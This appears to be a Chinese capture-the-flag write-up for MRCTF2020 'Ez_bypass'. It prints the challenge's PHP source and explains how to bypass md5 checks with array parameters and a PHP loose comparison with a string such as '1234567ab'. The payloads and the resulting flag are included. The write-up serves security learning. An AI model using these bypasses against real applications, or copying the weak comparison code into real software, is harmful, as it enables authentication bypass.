[MRCTF2020]Ez_bypass 1

md5绕过+php弱类型

点进去后发现：

<?php

$flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; 
if(isset($_GET['gg'])&&isset($_GET['id']))
 { 
    $id=$_GET['id']; 
    $gg=$_GET['gg'];
     if (md5($id) === md5($gg) && $id !== $gg)
      { echo 'You got the first step'; 
        if(isset($_POST['passwd'])) 
        { 
            $passwd=$_POST['passwd'];
             if (!is_numeric($passwd)) 
             { 
                if($passwd==1234567) 
                { echo 'Good Job!'; 
                    highlight_file('flag.php');
                     die('By Retr_0'); }
                else { echo "can you think twice??"; }
             } else{ echo 'You can not get it !'; } }
         else{ die('only one way to get the flag'); } 
        } else { echo "You are not a real hacker!"; } 
} else{ die('Please input first'); } }


//  1.数组绕过md5
//  2.passwd=1234567abc

此题需要了解的知识点：

$a != $b
md5($a) == md5($b)

‘0e1561561651561561651651…’ == ‘0e1561651651561561651…’
//true
所以思路是寻找转为md5后以0e开头的字符串
网站推荐

---

$a != $b
md5($a) === md5($b)

//md5( array(0=>“123”) ) -> null
//所以显然 null===null
所以思路是构造数组
payload=?a[x]=a1&a[y]=a2&a[z]=a3

x=>“a1”
y=>“a2”
z=>“a3”

---

那么构造第一个payload
id[x]=1&gg[x]=1

虽然有报错信息，但显然也已经绕过了md5

接着第二个payload
passwd=1234567ab

得到了flag
flag{8d86dd4a-1c04-4950-a692-daba2d9b3fad}